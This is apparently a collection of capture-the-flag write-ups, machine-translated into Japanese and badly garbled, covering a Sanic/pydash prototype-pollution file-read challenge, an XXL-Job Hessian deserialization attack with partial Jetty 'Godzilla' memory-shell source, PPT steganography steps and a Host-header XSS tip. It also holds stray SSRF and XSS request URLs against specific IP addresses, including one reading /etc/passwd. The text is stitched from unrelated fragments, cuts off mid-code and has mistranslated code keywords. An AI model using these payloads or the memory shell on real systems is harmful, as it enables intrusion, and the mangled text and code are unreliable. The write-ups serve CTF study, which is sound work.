.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
web
タイトル:Sanic's Revenge
問題解決手順
最初に、与えられた添付ファイル:を参照してください
Sanic Import Sanicから
OSをインポートします
sanic.responseインポートテキスト、htmlから
sysをインポートします
ランダムをインポートします
pydashをインポートします
#pydash==5.1.2
#ここのソースコードは、管理者によって削除されたようです。私はそれに隠された大きな秘密があると聞いた
クラスPollute:
def __init __(self):
合格
app=sanic(__ name__)
app.static( '/static/'、 './static/')
@app.route( '/*** secret *********')
async def Secret(リクエスト):
secret='**********************'
テキストを返します( '私のルート名を見つけることができますか?'+秘密)
@app.route( '/'、methods=['get'、 'post']))
Async defインデックス(リクエスト):
return html(open( 'static/index.html')。read()))
@app.route( '/pollute'、methods=['get'、 'post']))
async def pollute(リクエスト):
key=request.json ['key']
value=request.json ['value']
キーと値とタイプ(key)がstrと「パーツ」がキーではなく、「proc」がstr(value)およびtype(value)がlist:ではない場合
汚染=汚染()
pydash.set_(汚染、キー、値)
テキストを返す(「成功」)
else:
log_dir=create_log_dir(6)
log_dir_bak=log_dir + '.'
log_file='/tmp/' + log_dir + '/access.log'
log_file_bak='/tmp/' + log_dir_bak + '/access.log.bak'
log='key:' + str(key) + '|' + 'value:' + str(value);
#ログファイルを生成します
os.system( 'mkdir /tmp /' + log_dir)
f:としてopen(log_file、 'w')
f.write(log)
#バックアップログファイル
os.system( 'mkdir /tmp /' + log_dir_bak)
f:としてopen(log_file_bak、 'w')
f.write(log)
RETURN TEXT( '!ここで無謀な行動はありません、あなたの違法な操作が記録されました!')
__name__=='__main __' :の場合
app.run(host='0.0.0.0')
ソースコード:を分析します
/汚染ルートは、パラメーターキーと値を渡すことでプロトタイプチェーン汚染を実現できる汚染点pydash.set_を提供します。さらに、このルートはWAFも設定します。 WAFがトリガーされた場合、キーと値の値は /TMPディレクトリのファイルに書き込まれます
名前が不明なルートもあります。内部には秘密があると推測できますか?
プロンプトによると、ここのソースコードが完全ではないことがわかるため、完全なソースコードを取得する必要があります
ここでのエントリポイントは、プロトタイプチェーン汚染です。 file_or_directoryをルートディレクトリに汚染すると、ファイルの読み取りを実現できます。
次に、ソースコードファイル名を取得し、アクセス/static/proc/1/cmdline:にアクセスする方法を見つけます
次に、/start.sh:にアクセスします
ソースコード名:2q17a58t9f65y5i8.pyを取得します
/app/2q17a58t9f65y5i8.pyにアクセスして、完全なソースコード:を取得します
Sanic Import Sanicから
OSをインポートします
sanic.responseインポートテキスト、htmlから
sysをインポートします
ランダムをインポートします
pydashをインポートします
#pydash==5.1.2
#ソースコードは管理者によって削除されたようで、彼はそれに大きな秘密が隠されていると聞いた
クラスPollute:
def __init __(self):
合格
def create_log_dir(n):
ret=''
範囲(n):のiの場合
num=random.randint(0、9)
文字=chr(random.randint(97、122))
文字=chr(random.randint(65、90))
s=str(random.choice([num、letter、letter]))
ret +=s
Ret
app=sanic(__ name__)
app.static( '/static/'、 './static/')
@app.route( '/wa58a1qeq59857qqrppq')
async def Secret(リクエスト):
f:としてopen( '/h111int'、 'r')
ヒント=f.read()
テキストを返す(ヒント)
@app.route( '/'、methods=['get'、 'post']))
Async defインデックス(リクエスト):
return html(open( 'static/index.html')。read()))
@app.route( '/adminlook'、method=['get'])
async def adminlook(リクエスト):
#違法なログを見るためのエイジー管理者
log_dir=os.popen( 'ls /tmp -al')。read();
テキストを返す(log_dir)
@app.route( '/pollute'、methods=['get'、 'post']))
async def pollute(リクエスト):
key=request.json ['key']
value=request.json ['value']
キーと値とタイプ(key)がstrと「パーツ」がキーではなく、「proc」がstr(value)およびtype(value)がlist:ではない場合
汚染=汚染()
pydash.set_(汚染、キー、値)
テキストを返す(「成功」)
else:
log_dir=create_log_dir(6)
log_dir_bak=log_dir+'.'
log_file='/tmp/'+log_dir+'/access.log'
log_file_bak='/tmp/'+log_dir_bak+'/access.log.bak'
log='key:'+str(key)+'|'+'value:'+str(value);
#generate logファイル
os.system( 'mkdir /tmp /'+log_dir)
f:としてopen(log_file、 'w')
f.write(log)
#back up logファイル
os.system( 'mkdir /tmp /'+log_dir_bak)
f:としてopen(log_file_bak、 'w')
f.write(log)
RETURN TEXT( '!ここで無謀な行動はありません、あなたの違法な操作が記録されました!')
__name__=='__main __' :の場合
app.run(host='0.0.0.0')
余分なルート:WA58A1QEQ59857QQRPPQを見ることができ、ヒントを得るために直接アクセスしてください。
flag in /appですが、彼の名前を見つける必要があります!
アプリディレクトリでファイル名を表示する方法を見つける
ここでは、フラグファイルがアプリディレクトリにあることを促されますが、フラグ名はわかりません
次に、アプリディレクトリにファイルをリストする方法を見つける必要があることは明らかです
また、adminlookルートを表示することができ、 /TMPディレクトリにファイルを表示でき、違法ログはこのディレクトリに記録されています。最初に違法記録を一度トリガーしてから、adminlookルート:にアクセスします
ここには2つのディレクトリがあり、そのうちの1つはバックアップディレクトリの名前であることがわかります。したがって、このディレクトリへのアクセスを使用して上部ディレクトリに移動できます。
{'key':' __ class __ \\\\\ .__ init __ \\\\\\ .__ Globals __ \\\\\\。app.router.name_index .__ mp_main __ \\\。static.handler.keywords TMPディレクトリ、そしてベース値:を汚染します
{'key':' __ class __ \\\\\ .__ init __ \\\\\\ .__ Globals __ \\\\\。app.router.name_index .__ mp_main __ \\\。static.handler.keyword static/ddahj6 '}
また、ディレクトリ関数:を有効にすることを忘れないでください
{'key':' __ class __ \\\\\\ .__ init __ \\\\\\ .__ Globals __ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\。
次に、にアクセスしてください
フラグ名を表示してから、 /app /45w698wqtsgqt1_flagにアクセスしてフラグを取得できます
タイトル:EasyJob
問題解決手順
添付ファイルによると、XXL-Job-Executorによるアクセスに対して不正である脆弱性であることが確認できます。次のリンクを参照してください。
https://github.com/threekiii/vulhub-reproduce/blob/master/xxl-job%20executor%20%E6%9c%AAA6%8E%88%E6%9D%83%E8%AEA%BF%E9%97%AE6A6%8歳8です
ただし、XXL-JOBバージョンは比較的古く、ヘシアンの脱派化によって引き起こされる必要があるバージョンであり、問題はインターネットから出ていないことがわかります。現時点では、メモリホースを打つことは避けられません。したがって、この質問の重要なポイントは、実際にWeb依存関係なしで桟橋の記憶馬を注入する方法です。
ハンドラーは次のようにxxljobに組み込まれています
//
//Intellijのアイデアによって.classファイルから再作成されたソースコード
//(fernflowerディセパイラーを搭載)
//
パッケージcom.xxl.job.core.rpc.netcom.jetty.server;
com.xxl.job.core.rpc.codec.rpcrequestをインポートします。
com.xxl.job.core.rpc.codec.rpcreSponseをインポートします。
com.xxl.job.core.rpc.netcom.netcomserverfactoryをインポートします。
com.xxl.job.core.rpc.serialize.hessianserializerをインポートします。
com.xxl.job.core.util.httpclientutilをインポートします。
java.io.ioexceptionをインポートします。
java.io.outputStreamをインポートします。
javax.servlet.servletexceptionをインポートします。
javax.servlet.http.httpservletrequestをインポートします。
javax.servlet.http.httpservletResponseをインポートします。
org.eclipse.jetty.server.requestをインポートします。
Import org.eclipse.jetty.server.handler.abstracthandler;
org.slf4j.loggerをインポートします。
org.slf4j.loggeractoryをインポートします。
Public Class JettyServerHandlerはAbstracthandlerを拡張します{
private static logger logger=loggerfactory.getLogger(jettyserverhandler.class);
public jettyserverhandler(){
}
public voidハンドル(String Target、Request Baserequest、httpservletRequestリクエスト、httpservletResponse応答)IoException、servletexception {
rpcreSponse rpcreSponse=this.doinvoke(request);
byte [] responsebytes=hessianserializer.serialize(rpcreSponse);
Response.setContentType( 'text/html; charset=utf-8');
Response.SetStatus(200);
baserequest.sethandled(true);
outputStream out=response.getOutputStream();
out.write(responsebytes);
out.flush();
}
private rpcreSponse doinvoke(httpservletrequestリクエスト){
rpcreSponse rpcreSponse;
試す {
byte [] requestbytes=httpclientutil.readbytes(request);
if(requestBytes!=null requestbytes.length!=0){
rpcrequest rpcrequest=(rpcrequest)hessianserializer.deserialize(requestbytes、rpcrequest.class);
rpcreSponse rpcreSponse=netcomserverfactory.invokeService(rpcrequest、(object)null);
RPCRESPONSEを返します。
} それ以外{
rpcreSponse=new rpcreSponse();
rpcreSponse.setError( 'rpcrequest byte [] is null');
RPCRESPONSEを返します。
}
} catch(例外var5){
logger.error(var5.getMessage()、var5);
rpcreSponse=new rpcreSponse();
rpcreSponse.setError( 'server-error:' + var5.getMessage());
RPCRESPONSEを返します。
}
}
}
Jettyhandler、私たちがする必要があるのは、まったく同じものを注入することだけです。ここに特定の詳細について何も言うことはありません、記憶は次のとおりです
パッケージcom.xxl.job.core;
org.eclipse.jetty.serverをインポート。*;
Import org.eclipse.jetty.server.handler.abstracthandler;
Import org.eclipse.jetty.server.handler.handlercollection;
sun.misc.unsafeをインポートします。
javax.crypto.cipherをインポートします。
javax.crypto.spec.secretkeyspecをインポートします。
javax.servlet.servletexceptionをインポートします。
javax.servlet.servletoutputStreamをインポートします。
javax.servlet.http.httpservletrequestをインポートします。
javax.servlet.http.httpservletResponseをインポートします。
java.io.ioexceptionをインポートします。
java.lang.ref.Referenceをインポートします。
java.lang.reflect.fieldをインポートします。
java.lang.reflt.methodをインポートします。
java.net.urlをインポートします。
java.net.urlclassloaderをインポートします。
Java.util.scannerをインポートします。
//著者:BOOGIPOP
パブリッククラスのjettygodzillamemshellはabstracthandlerを拡張します{
string xc='3c6e0b8a9c15224a'; //鍵
文字列pass='username';
文字列md5=md5(pass + xc);
クラスペイロード;
public static string md5(string s){
文字列ret=null;
試す {
java.security.messagedigest m;
m=java.security.messagedigest.getInstance( 'md5');
m.update(s.getbytes()、0、s.length());
ret=new java.math.biginteger(1、m.digest())。toString(16).touppercase();
} catch(例外e){
}
返品;
}
public jettygodzillamemshell(){
System.out.println(1);
}
public jettygodzillamemshell(int s){
System.out.println(2);
}
static {
試す {
httpconnection valuefield=getValueField();
HandLercollection Handler=(handLercollection)valuefield.gethttpchannel()。getServer()。gethandler();
フィールド変動whenrunning=handler.getClass()。getDeclaredField( '_ MutableWhenrunning');
MutableWhenrunning.setAcc
http://103.39.221.102:8012//getCorsFile?urlPath=file:///etc/passwd
http://121.40.238.48:8012//getCorsFile?urlPath=aHR0cDovL2QyYjY0NWQ3LmRucy5kbnNtYXAub3Jn
http://119.91.146.127:8012/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D
-20240415195822385-3182302.(null))
-20240415195822385.(null))
-20240415195822430.(null))
-20240415195822638.(null))
-20240415195822411.(null))
に、他の線とは異なる緑の線があることがわかります。
Inputはテーブルです。
Outputは空です。トレースのデータはすべて小数です。
トレースのデータにドットプロットを描画してみてください:
データの各セットの最大値に多くのポイントがあることを発見しました。
40個のデータグループの最小値の添え字を使用して、グラフ分析を再度描画します。最大値は1つしかないことがわかったため、最大値の添え字を見つけ続け、入力テーブルから対応する文字を取得する必要があります:
Exp:
に移動します。 PPTから開くと、第2章の左上隅にある黒いピースです。ダブルクリックし、開いた後にすべてを選択し、色を変更し、色を変更し、Caesar Offset 10を復号化してからPART2 
PART3を取得します。私は本当にこれを長い間検索しました。その後、オンラインで検索したところ、PPTステガノグラフィは、VBAプロジェクト復号化と呼ばれるマクロとマクロスクリプトに関連している可能性があることがわかりました。最初にvbaproject.binを開いて、dpbバイトを見つけ、最後のビットをxに変更し、サフィックスを.zipに保存し、直接開き、含意のファイルを見つけます。 VBAフォルダーでモジュール1を開きます。
。暗号文を見つけました。それが何であるかはわかりませんが、プロンプトはBase64の後です。次に、最初にそれを復号化してから、文字化けしたコードを取得します。一般的に、特殊文字はよりRC4または腐敗しています。最後に、パスワードなしで復号化されていることがわかりました。次に、base64のレイヤーで復号化します。
PART4は、PPTを直接開きます(メディアフォルダの写真で構成されているため)。 3番目の写真は、目に見える隠された文字を選択することです。私のコンピューターはデフォルトで自動的にそれを選択するため、直接表示できます。 base64デコード
PART5は、第5章PPTのコメントにあります。直接サイバーシェフハットラン、マルチレイヤーベース64デコード、5番目のパート
PART6は、5番目のPPTテキストの境界の左上隅にあります。メディアフォルダーをスケーリングまたは直接分解することができます。 base64デコード
PART7は、PPT \スライドの下でSlides4.xmlにあり、ID4の位置を以下に促します。 rot13すべて、数字を含むことを意味します、base64デコード
PART9メディアフォルダで直接、猫の男の写真の左下隅を見てください。
です
ZIPサフィックスを変更すると、世界ドキュメント:010-6926 
で見つけます
写真:
合計で、PART23360675EFBPAYT4:606F-40PART53:5F-90DPART6:D-2PART93333333333333333333333333333333333333333333333333333333333333333333333333
バイナリファイルi13pomdzeazhfy4dgs+vua==ここにbase64+rc4+base64 
Get Part33:3-34pptファイル属性:010-695552 Ciphertext:qfpppppppppppppppq6zzmzzzzmmmmm32 bifldkey:lanjing;
PART1:FLAGを取得{EPPTマスター:
BB13を削除し、Base64 
PART8336087E Select Pane:
=
base64デコードしてフラグを取得するためにflag 
メソッド2:binwalkを使用してzlibファイルを分離し、コードは次のとおりです。 Open(input_fileName、 'rb')as compressed_file: compressed_data=compressed_file.read()decompressed_data=zlib.decompress(compressed_data)with open(output_filename、 'wb')as output_file.write.='35 .zlib'output_file='decompressed_data.txt'decompress_zlib_file(input_file、output_file)winhexを使用してdecompressed_data.txtを開いて、base64の後にエンコードされたフラグを見ることができます。
フラグを取得するためのデコード:
を作成することです
を超えるCLを使用したパッケージを投稿します
を満たしていないことがわかりました
としてパッケージ化されたことを見つけます
を備えたマルチパートアップロードパッケージを構築します
を返します
を送信することです
看到这种情况我们可以大概猜想一下,其中的后段代码可能是以下样子:<img src="<?php echo "http://{$_SERVER['HTTP_HOST']}/"?>xxx/aaa.png" />这样看来就很简单了,修改一下请求包中的host就能造成xss咯。
捡破烂小tips完结。
大功告成
